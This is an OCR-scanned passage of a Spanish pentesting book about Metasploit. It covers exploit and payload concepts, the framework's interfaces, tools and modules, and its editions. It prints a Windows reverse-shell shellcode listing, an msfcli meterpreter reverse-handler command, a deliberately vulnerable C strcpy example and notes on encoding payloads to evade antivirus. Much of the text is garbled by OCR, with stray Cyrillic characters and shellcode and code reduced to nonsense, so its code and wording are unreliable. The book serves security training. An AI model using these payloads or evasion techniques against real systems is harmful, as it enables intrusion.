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Introducción 


Introducción 


El presente libro бепе como objetivo proporcionar una visión global sobre el framework de 


, pentesting conocido como Metasploit. Esta herramienta dispone de gran cantidad de funcionalidades 


las cuales son muy utilizadas en el día a día por los auditores de seguridad para llevar a cabo sus 
test de intrusión. Es esta variedad una de las principales características importantes que proporciona 
Metasploit dando al usuario el poder para utilizar exploits de calidad comercial, pero además toda 
una infraestructura para realizar otras necesidades del auditor como puéden ser la recolección de 
información, escaneos en busca de vulnerabilidades, la post-explotación, la automatización de las 
tareas de auditoría o la generación de sus propios exploits. | 


La seguridad es una de las ramas de la informática que más rápido avanza, y es por ello que se 
debe estar bien informado йе las vulnerabilidades que salen diariamente, por ejemplo, mediante 
el uso de listas de seguridad. Imagínese llegando a una empresa la cual debe ser auditada, ya sea 
caja blanca o negra, y debe enfrentarse a una gran cantidad de equipos, los cuales serán puestos a 
prueba por su técnica y destreza en el arte de la intrusión. Las herramientas con las que cuenta es un 
factor indispensable para que la auditoría llegue a buen puerto, pero además, debe disponer de los 
conocimientos para poder ejecutar dichas herramientas con coherencia. Una cosa debe prevalecer y 
es que el auditor debe realizar una serie de fases previas antes de lanzar sus herramientas sobre los 
sistemas, ¿Metasploit engloba el proceso completo? Lógicamente no., pero se estudiará como este 


framework puede realizar fases previas a la explotación del sistema, lo que significa que Metasploit 


no es sólo explotación. 


Imagínese que sigue en la empresa objeto de la auditoría de seguridad, y tras marcarse unos objetivos, 
decide emprender el proceso de recolección de información. Este proceso puede devolver desde | 
gran cantidad de datos relevantes sobre la empresa objeto, o una mínima información apa rentemente 
no muy relevante. Tras el análisis de esta información observa que existen máquinas o sistemas que 
pueden encontrarse en riesgo, ya que no disponen de ciertas actualizaciones en algunas aplicaciones 
o en el sistema operativo. Decide lanzar el escaneo de vulnerabilidades, con la información recogida 
anteriormente, que tras un análisis exhaustivo han aportado datos interesantes, Tras el escaneo se 
ha confirmado que los sistemas son vulnerables, ahora tiene esa sensación de que esta cerca de 
conseguir uno de los grandes objetivos que es lograr entrar en el sistema y demostrar a quién le 
contrató que sus sistemas no eran todo lo seguro que él, en principio, pensaba. 


Se encuentra cerca del éxtasis, la intrusión en el sistema ajeno, el sistema prohibido, su reto, su meta. 
Conoce el punto débil del sistema y dispone de las herramientas y conocimientos para entrar en él. 
Es la hora de lanzar el exploit, ese pequeño código que te hace restar un objetivo en tu lista inicial. 
Tras la ejecución del exploit, dispone de una shell o, en el mejor de los casos, un meterpreter, el cual 


' 
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le proporciona un gran abanico de funcionalidades para realizar sobre la máquina vulnerada. Ha 
llegado al súmmum, pero ¿por qué parar aquí? Dispone de una máquina para poder acceder a otras, 
y conseguir lograr más objetivos. 


Ahora, бепе un equipo sobre el que poder elevar privilegios, obtener otras cuentas, poder Нераг a 
lugares dónde antes no podía llegar, y en definitiva seguir husmeando en esa gran red interna que 
dispone la empresa objeto. Puede hacerse pasar por otros usuarios, acceder a recursos compartidos, 
puede haberse convertido en el nuevo roof de la empresa. La post-explotación es un proceso que le 
ha ayudado a sentirse como en casa en un lugar tan extraño y ajeno al auditor. Pero todo toca a su fin, 
su jornada labora! iermina y debe preparar el informe con todo lo que ha hecho y ha conseguido en 
el día de hoy. Une parte muy necesaria, ya que debe informar de dónde están los fallos de seguridad 
y dar su recomendación para que puedan ser evitados en un futuro próximo. 


Hi libro presenta la exposición de ideas claras y de manera sencilla, mediante el uso de ejemplos 
prácticos, sobre Metasploit framework, sin dejar al margen el entorno sobre el que Metasploit se 
ejecuta que es ет test de intrusión. Hoy en día, los auditores no conocen еі enorme potencial que 
aporta el framework, o simplemente no disponen de los conocimientos técnicos para obtener el 
máximo potencial a esta herramienta. Es por ello que es deseo del autor que tras la lectura de 
este Hbro, el auditor encuentre en Metasploit su navaja suiza, siempre complementada соп otras 
herramientas, para el proceso de auditoría de seguridad. 
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Capítulo I 
_ Conceptos básicos 


1. Definiciones 


Si es la primera vez que usa Metasploit debe conocer de qué consta este framework antes de poder 
trabajar con él. Metaspioit puede ser tachado como un entorno de dificil manejo y configuración 
pero a través de las hojas de este libro podrá descubrir que en la mayoría de los casos es de sencillo 
manejo y muy flexible. Las definiciones que se exponen a continuación le ayudan a distinguir 
distintas herramientas que componen el framework, hay que tener en cuenta que éste se actualiza en 
pequeños periodos de tiempo y se implementan nuevas herramientas que se introducen en él, 


A continuación se exponen términos que se pueden encontrar en el día a día de un auditor, 
lo cual арома una base рага. saber qué conceptos se están tratando. Además, se especifican las 
vulnerabilidades más destacadas y definiciones propias del entorno de Metasploit. | 


Software fiable vs Software seguro 

El software fiabie cs aquel que hace lo que se supone que debe hacer, El software seguro es aquel 
que hace lo que se supone que debe hacer y nada más. Son los ocasionales y sorprendentes “algo 
más” los que producen inseguridad en un sistema. La solución ideal es utilizar software seguro 
siempre, pero el mundo real no es el ideal, por lo que se deben realizar ciertas acciones para mitigar. 
ese “algo más” que puede realizar cierto software. 


El software es desarro!lado por seres humanos por lo que es imperfecto por naturaleza, son esos fallos 


` de programación los que en muchas ocasiones provocan que el software disponga implícitamente de 


vulnerabilidadés. Si un atacante detecta esa vulnerabilidad puede disponer de una puerta de acceso 
al sistema en el mejor de los casos. | 


Вир 

Un bug es el resultado de un fallo de programación durante el proceso de creación o desarrollo de 
іаѕ aplicaciones. Este fallo puede haberse introducido еп cualquiera de las etapas del ciclo de vida 
de una aplicación, aunque, por lo general ocurre en la etapa de implementación. 
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Exploit 

Exploit viene del verbo inglés to exploit, que significa explotar o aprovechar. Un exploit es un 
código escrito con el fin de aprovechar un error de programación y la intención de obtener diversos 
privilegios. Un buen número de exploits tienen su origen en un conjunto de fallos de programación 
similares. 


Normalmente, con la ejecución de un exploit el atacante busca tomar el control de una máquina de 
manera ilícita, realizar una escalada de privilegios en un sistema local sobre el que no dispone de 
ellos о sobre una máquina remota comprometida, o realizar un ataque de denegación de servicio, 
causando la caída de una aplicación o un sistema, evitando el normal funcionamiento de un servicio. 


Por lo general el lenguaje estrella para desarrollo un exploit es el lenguaje С, También se pueden 
realizar exploits en otros lenguajes como Ruby, Java о Python, pero como se ha indicado 
anteriormente lo normal es la escritura de éstos en C. 


Algunos de los grupos de vulnerabilidades más conocidos son: 

- Vulnerabilidades de desbordamiento de buffer. _ ; 
- Vulnerabilidades de error de formato de cadena o format string bugs. 

- Vulnerabilidades de Cross Site Scripting, XSS. 

- Vulnerabilidades de SQL Injection. 


Payload ; 

Es la parte del código de un exploit que tiene como objetivo ejecutarse en la máquina víctima para 
realizar la acción maliciosa. La manera óptima para entender el significado de payload es mediante 
el uso de ejemplos. Un payload puede ser el código que se inyecta en una máquina a través de 
un exploit, y el cual permite al atacante ejecutar código en la máquina remota, Ese código puede 
ser el que implemente una shell inversa, es decir, la máquina víctima lanzará una conexión hacia 
la máquina del atacante devolviéndole una línea de comandos para que pueda interactuar con la 
máquina vulnerada, 


Otro ejemplo de payload puede ser una bind shell, es decir, una vez se ha introducido el código a 
ejecutar en la máquina remota éste deja a la escucha en un puerto de la máquina una shell. El atacante 
se conectará a dicho puerto mediante conexión directa y dispondrá de acceso y ciertos privilegios. 


Un payload también puede ser, simplemente, conseguir ejecutar en la máquina remota una-secuencia 
de comandos sobre la máquina víctima. Por ejemplo, para realizar una denegación de servicio sobre 
una aplicación en una máquina vulnerable, 


Shellcode 


Es un conjunto de instrucciones usadas como un payload cuando se produce el proceso de explotación 
del sistema. La shellcode son órdenes, generalmente, escritas en lenguaje ensamblador. Para generar 
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este tipo de código, normalmente, se utiliza un lenguaje de mayor nivel como puede ser С. Después, 
este código al ser compilado, genera el código de máquina resultante, el cual es denominado opcode. 


Las shellcodes deben ser de tamaño pequeño para poder ser inyectadas dentro de la pila de 
la aplicación, que es generalmente un espacio reducido. Es muy común, que en el proceso de 
compilación de la shéllcode se generen los llamados bytes nulos, los cuales provocan la frénada 
de la ejecución del código de ésta. El usuario que genere el código debe tener en cuenta esto, y 
debe encargarse de remplazar las instrucciones que generan estos bytes nulos por otras que no los 
produzcan, o realizando una operación ХОК, y de ésta forma conseguir que la shellcode se ejecute 


‚5ш problemas. 


pe 
windows/shell/reverse_tcp - 298 bytes (stage 1) 

* http://www. metasploit. com 

* LHOST=192,168,1,.1, LPORT=4444, ReverseConnectRetries=5, 

* EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= 

*/ 
unsigned char buff] = 
"“\хЇс\хеВ\х89\хб8®\хВ®\хӘВ\хбБ®\хВ9\хе5\х31\х02\х64\хВЬ\х52\х30” 
"AXBDAXSZAXOCA RBA XS ZA IAN ABLA TA X2ZBAXO TA XD7A RADA GA RGIA UE E" 
"\хзї\хєй\хас\х3с\хб1\х7с\х@2\х2с\х28\хс1\хсї\хёй\х®1\хс7\хе2" 
EXPO IS ZA STA XBDA 520 XBLA X42AXICAXO1A OO XBLA х40\х78\х85" 
PACO TIA AA OA AGO ABD BA IBA RBDA х58\х20\х81\ха3З\хез3” 
"\х3с\х48\х8Ь\х34\х8Ь\х@1\х@б\х3З \хТТ\х31\хсб\хас\хс1\хсТ\х@@^ 
"BA XCOTA RIBA ROA TA TIA IIA XI OA FEA RIDA IDA х24\х75\хе2\х58" 
"NED BA 29 81 GBA GBA XBDAXB CAIDA Xb GBA 1 CAOBA ROBA X8b" 
"AXO4A XBLA XOLA XDD ABIA AGA XZA X24 AGD SODA ROA AGA Sa ABLA E" 
"Axe SBA BASA XBLA xeb ABARCA 68 X331X321 X001X001X68" 
"ATINA IZA RITA GA BA GA RT ZA ROTA TÍA SA DBA RIO A x01" 
"NXBBAXBOAX2 xc GA AGO GBA ZN BOGA GDA XBOX TIA ROSA ABONA X50" 
"ASAS OA SO GBA GOA GBA CAB TADA eg TA MONA RITA ba” 
"\хВ5\хб8\хс®\ха8\х01\х@1\хб8\х02\х00\х11\х5с\х89\хеб\хба\х1@" 
"\х5б\х57\хб68\х89\ха5\х74\хб1\хїЇТ\х5\х85\хсё\х74\хёс\хТГ\х4е” 
"\хввВ\х75\хес\хбВ\хТ@\хЬ5\ха2\х5Б\х1Т\хв\хбБа\хёб\хба\ха4\х56б" 
"\х57\х68\х02\х@9\хсВ\х5Т\хЇТ\ ха5\х80\х36\хба\х40\хб8\х0\х10" 
"\хев\хөв\х56\хба\хё8\ха8\х58\ха4\х53\хе5\ xf \хаіЗ\х93\х53\хба" 
"AXO0A GE ASAS TABA BZ ADA CAMS TATI AOS OA CIA R2ZDAXCÓ" 
"\хВБ\хТб\х7З\хес\хс3”; 


Fig 1.01: Shellcode generada con Msfpayload. 


0-day exploit | 

Un 0-day exploit es una de las caracteristicas más peligrosas еп el ámbito de la seguridad informática. 
Un exploit de día сего, o 0-day exploit, es un código malicioso que permitirá а un atacante obtener 
el control remoto de un sistema. Como particularidad hay que recalcar que la vulnerabilidad de la 
que se aprovecha este exploit es desconocida por los usuarios y el fabricante del producto, Es este 
hecho el que hace un 0-day exploit como un instrumento muy peligroso en una guerra informática. 


Este tipo de exploits disponen de una ventana temporal existente entre el tiempo en el que se publica 
la amenaza o exploit y el tiempo en el que aparecen los códigos que corrigen dicha vulnerabilidad, 
En general, los parches o actualizaciones son desarrollados por los responsables de la aplicación. 
Es importante que las empresas dispongan de planes de actuación ante estos hechos, уа que sus 
sistemas pueden quedar expuestos a las amenazas desconocidas. 
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Buffer Overflow 

Esla vulnerabilidad, bastante común y con mucha historia en la informática, ocurre cuando una 
aplicación no comprueba correctamente el número de bytes que son almacenados en una dirección 
de memoria, o buffer, previamente reservada. De este modo, la cantidad de bytes que se van a 
almacenar son superiores a la cantidad reservada para tal fin. 


Para que se pueda entender mejor se propone el siguiente código en lenguaje С. El código muestra 
como se соріага el primer argumento que se le pasa а la aplicación argv/1] а un buffer reservado 
y estático con 10 hytes de tipo char. No existe ninguna comprobación de que la cadena que se 
pasa al programa mediante la variable argv/ 1] sea igual o inferior a 10 caracteres. ¿Es este código 
vulnerable? 

Е include “stdio.h> 

аг wain (int arge, char **argv) 

{ 

char bu£f(10]; 

printf (holamundo”):; 

etrcpy (buf, ахком [1}); 

return 0; 


} 


Este programa no limita la cantidad de bytes que se intentarán almacenar en la memoria reservada 
para el buffer, por lo que se podrá escribir fuera de éste. Al escribir en las direcciones de memoria 
adyacentes al hu/fer se podrá inyectar código ejecutabie para conseguir ciertos privilegios sobre el 
proceso y sobre la máquina objeto, o simplemente ocasionar un crash o caida de la aplicación. 


SOL Injection 

Es una de las grandes vulnerabilidades informáticas de la historia. Hoy en día, copa los primeros 
puestos en número de vulnerabilidades conocidas, junto a XSS y buffer overflow. Consiste en la 
inyección de código SQL en el nivei de validación de una aplicación que realiza consultas sobre una 
base de datos. 


En ofras palabras, la aplicación no chequea o filtra las variables utilizadas por el programa para 
recibir los parámetros у ѕе consigue inyectar código SQL dentro del propio código de la aplicación. 


Normalmente es ejecutada en aplicaciones web, con lo que se puede obtener información que existe 
en la base de datos del sitio en cuestión. También se puede encontrar en aplicaciones de escritorio. 


XSS (Cross-Site Scripting) | 
Es otra de las grandes vulnerabilidades de la informática, permite а un atacante inyectar código en 
páginas web que son visitadas por un usuario o víctima. El objetivo de esta vulnerabilidad es que 
una víctima entre en un sitio web y la presentación que se haga de éste se encuentre manipulada 
provocando un robo de información o manipulación sobre los datos que se visualizan, 
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Metasploit 
Es el nombre que recibe el proyecto, open source, sobre seguridad informática. Este proyecto facilita 
el trabajo al auditor proporcionando información sobre vulnerabilidades de seguridad, ayudando a 


explotarlas en los procesos de pentesting o test de intrusión. 


RRA 


Fig 1.02: Logo de Metasploit. 


Ei subproyecto más famoso del que dispone es Metasploit framework, o simplemente denominado 
Metasploit. Originalmente fue desarrollado en el lenguaje de programación Perl, para que con el 
paso del tiempo fuera escrito de nuevo bajo el lenguaje Ruby. Este framework es un conjunto de 
herramientas con las que el auditor puede desarrollar y ejecutar exploits y lanzarlos contra máquinas 
para comprobar la seguridad de éstas. Otras de las funcionalidades que aporta es un archivo de 
shellcodes, herramientas para recolectar información y escanear en busca de vulnerabilidades. 


' Módulos 


Metasploit dispone de módulos los cuales ayudan a aumentar de manera sencilla las funcionalidades 
del framework. Un módulo es una pieza о bloque de código que implementa una o varias 
funcionalidades, como puede ser la ejecución de un exploit concreto о la realización de un escaneo 
sobre máquinas remotas. Los módulos que componen el framework son el núcleo de Metasploit y 
los que hacen que sea tan poderoso, Éstos pueden ser desarrollados por los usuarios y de esta manera 
ampliar el framework de manera personalizada, y en función de las necesidades del auditor. 


Interfaces Metasploit 

Metasploit dispone de varias interfaces con las que interactuar con el framework. El usuario puede 
interactuar mediante una interfaz gráfica, línea de comandos o consola. También se dispone de la 
posibilidad de acceder directamente a las funciones y módulos que componen el framework, Esta 
acción puede resultar muy útil para utilizar ciertos exploits sin necesidad de lanzar todo el entorno. 


ЕЩ Metasploit para Pentesters 


La primera interfaz que se presenta es msfconsole. Es el todo en uno del framework, el auditor 
dispone de una consola desde la cual puede acceder a todas las opciones disponibles de Metasploit. 
La consola dispone de un gran número de comandos, los cuales disponen de una sintaxis sencilla 
y fácil de recordar. Esta interfaz se lanza ejecutando el comando msfconsole en una terminal, si se 
encuentra en Linux. 


routGroot:/pentest/exploits/framevork34 msfconsole 


ННН BREH # 
# H F # # # A 
# й ДЕ R HA 
я ES HR R 
# 
# 


НН R НАННЕ 
# # 

# 

# 

# # # # # # 


# 
# 
# 
# 
# НН B PREH ННН 9 


$ 

г 

# 

# 
=[ velasploit v3.7,0-velease [core:3.7 ар1:1.8] 

- --=[ 684 exploits - 355 auxiliary 

- --=[ 217 payloads - 27 encoders - В nops 


msÍ > 


Fig 1.03: Consola de Metasploit framework. 


La segunda interfaz que se presenta es Armitage. Esta interfaz proporciona un entorno gráfico е 
intuitivo al auditor para llevar a cabo el test de intrusión y entender el hacking de manera sencilla. 
Esta interfaz se lanza ejecutando el comando armitage en una terminal. 


> (E dialup 

» (E freebsd 

» (5% hpux 

» к 

» (E linux 

> @ multi 

> (8 netware 

> @ osx 

> (5 solaris 

> f] unix 

> 8 windows 
» (Ej payload 


PS 
с 
AR y 


NR EI NA 


i тет EN { ТЇЙ Scone Tost i 
SUP-LOOPBACK RUNNING: HTU 16436: + Hetrick poani 
RX: packetsi80254 errors10 dropped:0 Dverruns10 гапе. 
TK packets180254 errors10 drappedio ч averrunsi0 Torce 


mst A 067 netapi) > 
Fig 1.04: Interfaz gráfica Ж 
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La tercera interfaz que se presenta es la web Ul de Metasploit. Con esta interfaz se puede gestionar 
el test de intrusión de manera remota, sin necesidad de disponer del framework en local, pudiendo 
realizar casi todas las opciones que pueden realizarse desde la consola. 


AB 


E ТШЩ ү 0 t ттл 


=$ бо lo Hosl 8 Vakie оф Scari Ema СТ Фи Modules Г Т Bruleforce СЕХ : 0 Nesz Host 
e 


Ш Hosis эш! ГОЗ 9 [O aa] Vulnerables [& Captured Dala Pra | БИКЛЕ ЛКЫ СЕ 


Show [1001] [=]! entries | „ү М 
Ñ к Кат А 
B: В Address > | Мать... : US Нате е ER Versione | топові: Services: : і 1 ушпз Si ; kotes | ‚ Updated | 
А E? Ци t de 
El 1924684121 i хр a коой Windows (Р) deves. 59 | |2 aida 
(VirtualBox) А 


Showing 1 lo t of 1 entries 


ТААТ ВИРА НАЛЕ ЗЫННАН Аз эшн. А SELELI] 


Fig 1.05: Interfaz web Metasploit. 


La cuarta interfaz que se presenta es ms/cli. Esta interfaz no permite la interacción directa, está 
pensada para automatizar la explotación de los sistemas. Esta interfaz se lanza ejecutando el comando 
msfcli, el cual dispone de un parámetro en el que se indica el módulo que se requiere, módulo explo it 
o auxiliar, y opciones en función de lo que el auditor necesite. Más adelante se especificará en mayor 
бегае esta herramienta. - 


rootároot: /pentest/exploits/framework34 msfcli exploit/multi/handler payload=win 
dows/meterpreter/reverse_tcp lhost=192.168.1.40 Бин ESE 
[+] Please wait while we load the module tree.. Pi 


={ metasploit v3.7.0-release [core:3.7 api:1.0] 
+ -- --=[ 684 exploits - 355 auxiliary 
+ -- +-®[ 217 payloads - 27 encoders - В nops 


payload => windows/meterpreter/reverse_tcp 

lhost => 192.168,1.49 

\рогї => 4444 

(* ] Started reverse handler оп 192,168.1.40:4444 


Fig 1.06: Interfaz msfcli. 


Herramientas del framework 


Se disponen de ciertas herramientas que dan acceso directo al auditor para trabajar con funcionalidades 
específicas del framework. Estas herramientas pueden ser utilizadas en situaciones específicas por 
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parte del usuario, sin necesidad de lanzar la consola y cargar el entorno al completo. Se pretende dar 
a conocer y definir dichas herramientas, explicándose con mayor detalle más adelante 


Mstpayload | 

Es una herramienta orientada а todo lo relacionado con el ámbito de las shellcodes. Msfpayload 
es capaz de generar shellcodes para distintos lenguajes de programación, ejecutables que inyecten 
el código malicioso en la máquina victima tras su ejecución, listar las shellcodes disponibles en 
Metasploit, son sus principales funcionalidades. Normalmente, se utiliza para generar el código 
que se utilizará con un exploit que no se encuentre en el framework, pero también puede ayudar гі 
auditor para probar los diferentes tipos shelléodes. 


Msfencode 

Esta herramienta se encarga de dificultar a los sistemas de intrusión, 1DS, e infección, antivirus, la 
detección del payload. Además, permite eliminar los bytes nulos que se generan en la creación de 
una shellcode. ¡En qué se basa msfencode? Se dispone de una serie de encoders o codificadores para 
ofuscar de algún modo estos payloads con los objetivos nombrados antericrmente. 


Esta herramienta es interesante cuando se dispone de un payload generado соп msfpayload, cl 
cual puede disponer de bytes nulos, x00, xff. Además, la codificación del código es prácticamente 
obiigatoria si se requiere que ese ejecutable llegue a una máquina con aplicaciones de protección. 


msivenom 

Esta herramienta unifica las aplicaciones msfencode y msfpayload. Su principal ventaja es disponer 
de ambos comandosen una sola instancia y un incremento de velocidad сп la generación de las 

acciones. Simplemente, se puede tratar dicha herramienta como una ayuda al audilor para disponer 

de todo Jo necesario para generar los payloads y codificarlos o cifrarlos desde una misma herramienta 

sin necesidad de utilizar formatos intermedios. 


Msfpescan y те сар 

La herramienta »/fpescan permite escanear ficheros ejecutables o DLLs de Windows para encontrar 
instrucciones de código máquina sobre una imagen basada en memoria. Por otro lado la herramienta 
mstelÍscan permite realizar las mismas tareas pero sobre las aplicaciones ELF en sistemas operativos 
LINHA 


Msfrop 

Hoy en día los desarrolladores de exploits se encuentran con DEP(Data Execution Prevention), 
habilitado por defecto en los sistemas operativos más nuevos. DEP previene la ejecución del 
shellcode en la zona de memoria denominada como pila. En este punto los desarrolladores se vieron 
obligados a buscar como voltear esta mitigación, desarrollando la llamada ROP(Return-oriented 
programming). El payload ROP se crea utilizando conjuntos de instrucciones ya existentes en 
binarios en modo no ASLR (Address Space Layout Randomization), y de este modo conseguir que 
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el shellcode sea ejecutable, Cada conjunto conseguido debe Барыр con la instrucción RETN para 
continuar con la cadena ROP. Se puede encontrar que este tipo de conjuntos se llaman gadgets. 


іа herramienta ms/rop realiza un análisis sobre el binario que se le pasa y tras el procedimiento 
devolverá los gadeets utilizables. | i 


Mstd 
Esta herramienta proporciona un demonio o servicio de Metasploit el cual genera un listener en un 
puerto. Los clientes podrán conectar con este servicio y disponer de su propia interfaz de consola, 


hay que tener en cuenta que todos los clientes utilizan la misma instancia del framework. 


Los clientes suelen conectarse a través de la famosa herramienta nefcat, indicando la dirección IP у 

El Y 
e! puerto, Este servicio da flexibilidad y la posibilidad de utilizar el framework en remoto con todas 
las funcionalidades disponibles en local. 


Arquitectura de ] Metasploit 

En la imagen se puede visualizar la arquitectura de la que está compuesta Metasploit. En ella se 
pueden observar 3 librerías críticas como son rex, msf core y msf base, las distintas interfaces ya 
explicadas en este libro y los 6 tipos de módulos que se dispone en el framework. Las herramientas 
MSF y los plugins externos también se especifican y se puede visualizar con que librería inter actúan 
directamente. 


- ¿LIBRERIAS 


. ExpLOtIS {тке 


£ 4 AUILIARY 


Fig 1.07; Arquitectura de Metasploit. 


La librería rex es la básica y se encarga de la mayoría de las tareas, manejando sockets, protocolos, 
por ejemplo, SSL, SMB, HTTP, y otras operaciones interesantes como son las codificaciones, por 
ejemplo, XOR, Base64 o Unicode. 
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Las librerías msf' core y msf base proporcionan APIs al framework. Las interfaces, módulos y plugins 
interactúan con la API base y core que se encuentra en ambas librerias. Con este esquema se puede 
entender que las librerías son el núcleo del framework y que todos los elementos de alrededor 
dependen de éstas. Ruby es el lenguaje encargado de implementar el núcleo de Metasploit. 


А 


Tipos de módulos en Metasploit framework 

Los módulos implementan las funcionalidades del framework, Existen 6 categorías, a dia de hoy, 
aunque en muchos libros y sitios web de Internet se especifican 5 categorías, ya que no se considera 
el módulo de post-explotación como uno independiente. 


rootgroot:/pentest/sxploits/framework3/modulesé ls 
auxiliary encoders exploits modules.rb.ts.rb порѕ payloads post 
rootéroot: /pentest/exploits/framework3/modulesé 15 auxiliary/ 

admin crawler fuzzers pdf server spoof voip 

client dos gather scanner sniffer sqli 

rootGroot: /pentest/exploits/framework3/modulesk 15 encoders/ 

cmd encoder test.rb.ut.rb generic mipsbe mipsle php ppc sparc x64 x86 
rootGroot:/pentest/exploits/framework3/modules* ls exploits/ 

aix dialup һрих linux netware solaris windows 

bsdi freebsd irix multi osx unix 
rootaroot:/pentest/exploits/framework3/modulesé 15 nops/ 

armle пор _test.rb.ut.rb php ppc sparc tty x64 x86 

root@root: /pentest/exploits/framework3/modutes# ls payloads/ 

singles stagers stages 

root@root:/pentest/exploits/framework3/modules# 15 post/ 

multi osx windows 

rootáiroot: /pentest/exploits/framework3/modulesk 


Fig 1.08: Módulos de Metasploit. 


A continuación se especifican los objetivos de los distintos módulos que componen el entorno. Hay 
que destacar que estos módulos son totalmente escalables fácilmente. 


El módulo auxiliary proporciona herramientas externas al framework para la integración y utilización 
con Metasploit. De este modo el auditor puede utilizar escáneres, herramientas para denegación de 
servicio, sniffers, fuzzers, etc. En la imagen anterior se puede visualizar todas las posibilidades que 
ofrecen este tipo de módulos. 


El módulo encoders proporciona codificadores para ofuscar el código de las shellcodes y de este 
modo evitar que los sistemas antivirus puedan detectar el payload. En la imagen se puede visualizar 
las distintas categorías para los encoders, las más comunes son para arquitecturas x86 y x64. 


El módulo exploits es, quizá, el más vistoso de todos, en él se encuentran los exploits alojados. Se 
organizan mediante categorías, por sistema operativo o tecnología. Más adelante en el libro se verá 
en profundidad distintos ataques y exploits utilizados durante un test de intrusión. 


El módulo de payloads concentra los distintos códigos maliciosos ordenados también por categorías. 


En este caso, las categorías son singles, stagers, stages, y como subcategorias se organizan рог 
payloads para distintas tecnologías o sistemas operativos. 
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El módulo de pos! almacena en su interior código para ejecutar acciones referidas a la fase de post- 
explotación como son la escalada de privilegios, la impersonalización de tokens, captura de pruebas 
sobre la máquina remota, etc. También se organiza por categorías, como puede ser por sistema 
operativo. 


El módulo de лору contiene código capaz de generar instrucciones МОР para los códigos maliciosos. 
No existen gran cantidad de aplicaciones de-este tipo en el módulo de nops. Están organizados por 
arquitectura y lo más normal es utilizarlo para máquinas x86 о x64, 


2. Versiones de Metasploit 


Metasploit dispone de 3 versiones distintas y claramente diferenciadas en el mercado de la seguridad 
informática. Las 3 versiones están disponibles a través del sitio web oficial ht/p://wwwmetasploil. 
com y disponen de distintas características y precios. Por otro lado en el sitio web definen a Metasploit 
framework como la base de estas versiones, por lo que se puede ver сото que todas disponen del 
framework como base. 


Anteriormente, se ha explicado que el proyecto es open source y como tal, se dispone de una primera 
versión denominada Metasploit Community Edition. Esta edición está disponible para su descarga 
gratuita para sistemas operativos Microsoft Windows y Linux. Normalmente, los usuarios utilizan 
distribuciones Linux dónde ya se encuentra instalada, dichas distribuciones están orientadas а la 
auditoría de seguridad informática. . En Windows es totalmente funcional, por lo que también se 
recomiendan las pruebas en estos sistemas operativos, pero en este libro,se ha utilizado, generalmente, 
la distribución BackTrack. 


En esta web se dispone de las otras 2 versiones de Metasploit las cuales ya son de pago. Se dispone 
de Metasploit Pro y Metasploit Express que incorporan un mayor número de funcionalidades. 
También se dispone de distintas versiones en función del sistema operalivo, 


Metasploit Community Edition 


Esta edición dispone de una gestión muy sencilla para la realización de las pruebas de intrusión en 
los sistemas. En esta edición se dispone de las siguientes características: 


- Una interfaz gráfica intuitiva y limpia hace que sea mucho más sencillo comenzar con el: 
proceso de verificación de las vulnerabilidades. К 


- — Identificación de equipos en una red, puertos abiertos y fingerprint del sistema operaliW: 
y servicios. | кыы 
EE Н "1> +, > нр datos. 
- integración con escáneres de vulnerabilidades. Importación a Metasploit de [08 ан 
obtenidos con las herramientas de escaneo como son итар y nessus, entre otros. 


Fla 
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- Ваѕе de datos de exp/oits, una de las más grandes a nivel mundial, para garantizar el éxito 
сп el proceso de intrusión. Cada módulo dispone de un ranking que indica la tasa de éxito y 
el impacto de éste en el sistema. 


- Verificación sobre la posible explotación de una vulnerabilidad. Metasploit puede 
verificar si una vulnerabilidad es explotable o no, sin necesidad de probar a lanzar el ataque. 
Esto aumenta la productividad y reduce el coste, ayudando además a prevenir la violación de 
datos internos de los sistemas. 


- Explotación en vivo у real de los activos de la empresa. En la mayoría de las ocasiones 
demostrar que una vulnerabilidad es critica para la empresa puede ayudar a convencer a los 
propietarios de dichos activos. 

- E[l uso de esta versión es gratuita, incluso para las empresas, una solución ideal para 
presupuestos ajustados. 


Metasploit Pro 
Ип esta edición se dispone de varias funcionalidades extra, además de las que se han visto en la 
versión Community Edition. A continuación se exponen las funcionalidades adicionales que ofrece: 


- Auditoría de contraseñas. Se pueden identificar patrones de contraseñas débiles, las 
cuales pueden ser vuineradas mediante ataques de fuerza bruta. 


- Auditoría de seguridad de la infraestructura ІТ. Se pueden realizar pruebas de intrusión 
sobre dispositivos de red, equipos de escritorio, servidores dónde se alien las bases de 
datos de éstos y las aplicaciones web. Este último punto es muy interesante para la auditoria 
de apiicaciones web. 


- Social engineering. La ingeniería social es una técnica potente siempre que el auditor 
sepa como explotarta, con ella se pone a prueba la concienciación del personal de la empresa. 


- Reporting. informar a las partes interesadas, propietarios de los actives de la empresa en 
cuestión, es algo fundamental y una de las características más interesantes. 


- Automatización de los test de intrusión. Las empresas, a menudo, sólo pueden aceptar 
la comprobación in sifu de los equipos, por temas económicos. Metasploit Pro reduce 
drásticamente 105 costes automatizando estas pruebas. 


simulación de ataques. Una característica interesante es la simulación de ataques, desde 
un punto de vista realista, tanto en redes IPv4 como 1Руб. 


Metasploit Express 

Esta edición está pensada para los profesionales ТІ que necesitan trabajar con test de intrusión, 
sin disponer de una amplia formación o el desarrollo requerido por Metasploit Framework. Esta 
versión está pensada para no requerir.de ciertas características avanzadas que se pueden encontrar 
сп Metasploit Pro. Las características base siguen siendo las mismas que en Community Edition. 
También dispone de algunas de las características que se han comentado en Metasploit Pro, pero 
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сото curiosidad se enuncia laevaluación de las redes IPy6, asegurando que la red está a salvo de lo: 
ataques en redes IPv6, incluso si la red implementada en el entorno empresarial sea una red IPv4, 


Para mayor información sobre características en todas las versiones se puede consultar fa siguiente 
dirección URL At1p:/Awww.rapid?.com/products/penetration-testing.jsp. б 


3. El test de intrusión o pentest 


En este libro se ha mencionado en diversas ocasiones la palabra pentest, test de intrusión o 
penetration test, pero ¿qué es realmente esto? ¿En qué ámbito se está hablando? ¿Qué fases dispone. 
un test de intrusión? ¿Arte o procedimiento? Estas preguntas, en algunas ocasiones, no son fáciles 
de responder ya que pueden depender de diversos factores. 


Un test de intrusión es un método que evalúa el nivel de seguridad de una red de equipos o sistemas 
informáticos. Se realizará una simulación de un posible ataque informático con fines maliciosos, 
tanto desde dentro de la organización objeto, (los cuales pueden disponer de un cierto nivel de 
acceso a los sistemas), como desde fuera de la organización, (sin disponer de ningún tipo de acceso 
autorizado a los sistemas). El rol que se dispone desde dentro de la organización es la de un miembro 
de la empresa que se encuentra descontento y de esta manera se puede simular hasta dónde podría 
Hegar. Por otro lado el rol desde fuera la organización sería la visión de un hacker sin apenas 
información de ésta, con lo que se pretende simular hasta dónde podría llegarse desde fuera. 


